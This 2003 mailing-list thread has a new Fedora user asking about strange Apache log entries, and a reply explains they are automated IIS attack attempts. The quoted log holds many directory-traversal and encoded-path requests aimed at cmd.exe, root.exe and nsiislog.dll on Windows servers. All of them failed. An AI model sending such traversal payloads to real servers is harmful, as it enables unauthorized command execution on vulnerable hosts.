attacked? hacked? help.....!

Scott Burch scott at bulldoginfo.com
Tue Dec 9 05:43:22 UTC 2003


These are standard attempts to crack IIS.  They are probably being sent
by a script-kiddie.  Aren't you glad you are running Linux!! 

Don't worry, your log will be full of these.



On Tue, 2003-12-09 at 00:26, Lisa Durham wrote:
> I am very new to Linux but was poking around in my newly setup Fedora 
> Core 1 system today and came upon the lines below in the Apache Access 
> Log when I used the "System Logs" icon in the System Tools Menu.
> 
> Is the IP at the beginning of each line the IP that requested the file 
> that is shown at the end of the line? with the date and time in the 
> center? If this isn't what's shown in this file, what is this format? 
> What does this file tell me? Am I paranoid, or was someone trying to 
> access my machine (but ignorantly assuming it was a Windows machine)?
> 
> 
> quoted Apache Access Log:
> 
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir 
> HTTP/1.0" 404 325 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 382 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
> "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET 
> /scripts/nsiislog.dll" 404 331 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 382 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
> "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET 
> /scripts/nsiislog.dll" 404 331 "-" "-"
> 
> ----------------------------------------
> 
> Thanks,
> Lisa
> 
> 
-- 
---------------------------------------------------
Scott Burch
President and Chief Scientist
Bulldog Information Services
212-343-8148 x111

     .-.
     /v\    The software said it requires      
    // \\      windows 2000 or better,
   /(   )\      so I installed LINUX 
    ^^-^^       




